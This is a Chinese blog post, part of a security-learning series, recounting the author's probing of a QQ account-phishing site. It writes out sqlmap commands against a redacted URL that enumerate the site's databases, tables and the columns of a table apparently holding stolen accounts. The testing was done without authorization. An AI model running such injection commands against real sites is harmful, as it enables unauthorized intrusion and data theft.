记一次简单的对盗号网站的渗透

已于 2024-09-13 08:54:34 修改
阅读量677 收藏 19
点赞数 10
分类专栏: 安全 文章标签: 网络 安全 web安全
于 2024-08-19 13:11:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmels/article/details/141320265
版权

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
  23. MSF(3)——apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 使用FofaSpider和Python联动批量挖洞

晴朗的周一上午,我正在无聊地用电脑玩刺客信条,突然一个朋友打电话过来,告诉我他发现一个QQ盗号的网站,已经有人被骗了,要我赶快去看看。

随即发来一个附件,打开看到一个URL。

在这里插入图片描述
跟着URL进入网站,冲出来就是一个登录界面。
在这里插入图片描述
一眼盗号网站

随便输入账号密码,点下登录,一个验证码授权的界面
在这里插入图片描述
到这里此盗号网站的逻辑就很清晰了。先伪装成学期档案校对,骗取小白输入账号密码,收取小白的验证码,从而实施盗号。

我输了我的手机号想试试有没有短信轰炸漏洞,但是半天没收到短信,回去网站一看,
在这里插入图片描述
还要排队。也许,这网站后台是人工?

我去查了whois和备案信息,均无果。想去扫目录和子域名,怕扫崩。我决定先观察一下这个主站。

在输入了账号密码后进入号码验证的界面,可以明显看到URL中有参数id
在这里插入图片描述
尝试在id后加上单引号
在这里插入图片描述
一发入魂,直接上SQLMap。

python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259'

在这里插入图片描述
爆数据库

python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259' -dbs

在这里插入图片描述
爆表

python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259' -D rre -tables

在这里插入图片描述
爆字段

python .\sqlmap.py -u 'http://xxxx/tel.php?action=shoy&id=3259' -D rre -T qq_list -columns


爆到这里就差不多了,及时收手。

最后我拿漏扫器爆扫了这个站点好几遍,发现上面还部署了好几个盗号界面。由于站点太过简单,甚至连后台管理都没有,只有SQL注入。

没想到这样简陋的页面也能骗到很多人,只能说希望大家加强防范吧。

后记

这个文章写完大概十几天后,我的一个朋友告诉我他的QQ被盗了,要我辅助他找回。然后他把那个盗他号的网站发过来。我一看,这不还是这个站点吗,只是换了一个子目录,连域名都没变。
在这里插入图片描述
我之前渗透的时候还把这个页面扫出来了,当时没管。今天再来测试,一模一样的SQL注入漏洞。
在这里插入图片描述
没想到过了这么久还能骗到人,真不知道我这朋友的211怎么考上的。

无话可说,加强防范

漫路在线
关注
专栏目录
盗号与钓鱼网站网络安全问题原理与防范详解
悦分享
10-04 115
在黑色产业链中,有人制作、销售工具,也有人专门从事诈骗活动。这些人建立的群体,关系并不是非常紧密的,可能仅仅是依靠QQ群或其他IM互相联系。因此打入这些人所在的圈子,并不是特别困难的事情,这样能掌握敌人的第一手资料。黑客们也有自己的群体,在社区里打听,也能得到一些有用的消息。
网站漏洞扫描 渗透方法基础大全
网站安全资讯
09-25 2790
这几天整理了下网站渗透测试中基础部分的第三节,我们SINE安全渗透工程师对代码安全审计,手工渗透测试检查代码的危险漏洞方法,找出安全问题重点,配合工具扫描来达到测试漏洞的目的,本测试重点仅限于客户授权才能操作,切忽非法尝试入侵!以下方法只是提供网站安全检测的具体参考意见。 1.5. 代...
渗透测试 |一次黑入盗号网站后台
Python84310366的博客
08-07 1184
某学校群聊又有人被骗了,发了类似这样的内容,点进去一看就是伪装成QQ邮箱或者QQ空间后台的网站,骗取QQ号码。随便填写账号密码后,有一个假的学籍查询表单,让你填一些敏感信息啥的(黑入后台后发现居然真有人写了,汗)。突然心生一意:要不试试SQL注入看看?1过程直接浏览器F12,点开网络,然后随便输个账号密码,点登录,就抓到登录接口了。负载payload里可以看到请求的参数为u、p、step三个参数,此处图片就不展示了。
一次幸运的漏洞挖掘
最新发布
realmels的博客
09-12 705
一次幸运的漏洞挖掘
渗透测试 重点方法检测网站漏洞
网站安全专家
09-25 1867
这几天整理了下网站渗透测试中基础部分的第三节,我们SINE安全渗透工程师对代码安全审计,手工渗透测试检查代码的危险漏洞方法,找出安全问题重点,配合工具扫描来达到测试漏洞的目的,本测试重点仅限于客户授权才能操作,切忽非法尝试入侵!以下方法只是提供网站安全检测的具体参考意见。 1.5. 代码审计 1.5.1. 简介 代码审计是找到应用缺陷的过程。其通常有白盒、黑盒、灰盒等方式。白盒指通过对...
渗透学习笔(一)-- 基础概念
CK_0ff的博客
01-08 712
声明: 本文内容均来自互联网,旨在提高网络安全水平,请遵守网络安全法规,不要将技术用于非法用途。本文严禁转载。 文章目录基础名词域名与DNS脚本语言与后门WEB 基础名词 域名与DNS 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置)。 由于IP地址具有不方便忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name Sy.
号码泄露证姓名身份手机怎么办/身份证号码手机号码姓名泄露-小白渗透教程
程序员六七的博客
06-08 1118
上面这句话绝不是危言耸听,只要你是一个现代人,需要通过手机来注册一系列的社交软件和网站,那你的身份信息泄露的几率就会非常之高。
渗透测试:密码破解小结
收集盒 Book box
09-13 5114
0x00 前言 一次测试的过程总会涉及到"密码"与"加解密".在踩点的过程中,对弱口令的尝试是必不可少的过程,从xx抓鸡到内网哈希批量传递,从个人PC到网络设备/工控设施,只要依旧采用单因素模式的密码认证,密码扫描就不会被遗忘.以下笔者简单分享总结安全测试中密码扫描与破解的技巧,如有疏漏错误,还望不吝赐教. 0x01 整理一份优秀的字典 想破解密码,要求我们已经"拥有"别人的
seay代码审计工具_渗透测试 网站代码审计等基础方法篇
weixin_39613951的博客
12-06 880
这几天整理了下网站渗透测试中基础部分的第三节,我们渗透工程师对代码安全审计,手工渗透测试检查代码的危险漏洞方法,找出安全问题重点,配合工具扫描来达到测试漏洞的目的,本测试重点仅限于客户授权才能操作,切忽非法尝试入侵!以下方法只是提供网站安全检测的具体参考意见。1.5. 代码审计1.5.1. 简介代码审计是找到应用缺陷的过程。其通常有白盒、黑盒、灰盒等方式。白盒指通过对源代码的分析找到应用缺陷,黑...
《黑客之道》--网络安全 黑客攻防教程 渗透测试 利用第三方服务对目标进行被动信息收集防止被发现
xueshenlaila的博客
11-01 1330
被动信息收集 3.1.1 被动信息收集概述和目的 信息收集的方式可以分为两种:被动和主动。 被动信息收集方式是指利用第三方的服务对目标进行访问了解,比例:Google搜索。 主动的信息收集方式:通过直接访问、扫描网站,这种将流量流经网站的行为。比如:nmap扫描端口。 被动信息收集的目的:通过公开渠道,去获得目标主机的信息,从而不与目标系统直接交互,避免留下痕迹。 3.1.2 信息收集内容 IP地址段 域名信息 邮件地址 文档图⽚数据 公司地址 公司组织架构 联系电话 / 传真号码 人员姓名 / 职务
Web安全攻防渗透测试实战指南笔
Ren59421的博客
04-05 8078
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
木马经典渗透分析与制作方法,传播与信息泄露的原理
qq_16620025的博客
07-24 734
木马原理分析 很多时候我们都知道,技术是把双刃剑,它可以用来帮助人,但不经意间也能产生破坏 信息如何泄露?木马如何隐藏并传播? 下面通过例子来说明一种简单的病毒制作及传播方式。 -----------------------------------------------------------------------------------------------------------...
一次艰难的SQL注入(过安全狗)
热门推荐
realmels的博客
02-01 1万+
本专栏是笔者的网络安全学习笔,一面分享,同时作为笔 文章目录前文链接1.1 前言2.1 注入测试2.1.1 绕过第一式:汉字双字节编码绕过单引号3.1 获取数据库3.1.1 绕过第二式:注释3.1.2 绕过第三式:内联注释绕过空格4.1 获取表名4.1.1 绕过第四式:select过安全狗5.1 获取列名5.1.1 绕过第五式:骚操作绕过魔术函数6.1 爆帐密总结 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发.
MSF(3)——apk和exe的加马(过360、火绒)
realmels的博客
08-07 7149
apk和exe加马免杀的方法
burpsuite工具抓包及Intruder暴力破解的使用
realmels的博客
12-20 6195
本专栏是笔者的网络安全学习笔,一面分享,同时作为笔 前文链接 WAMP/DVWA/sqli-labs 搭建 前言 仅供交流分享,禁止用于非法用途 上篇已经搭建好了靶机,这篇简单讲解工具burpsuite的使用,以及用burpsuite的Intruder暴力破解密码。 ButpSuite工具安装 参考文章:https://www.ddosi.com/b309/我是按照这篇文章安装的burpsuite,可以自己参考这篇文章。 首先需要下载jdk,要下载jdk9及以上版本,我这里下载的是jdk11 .
MSF(2)——各种木马的生成及简单的免杀
realmels的博客
06-11 4272
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.csdn.net/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
MSF(1)——一次完整的渗透流程
realmels的博客
09-04 4131
本专栏是笔者的网络安全学习笔,一面分享,同时作为笔 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件.
QQ盗号产业链分析:现状、挑战与应对策略
报告详细列举了盗号产业链中的术语,如“孖号”、“信封”、“死号”等,揭示了这一黑色产业链的内部运作。面对这些挑战,古开元提出了打断产业链的总体思路,即通过提高各个环节的成本,采取纵深防御与战术反攻相...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值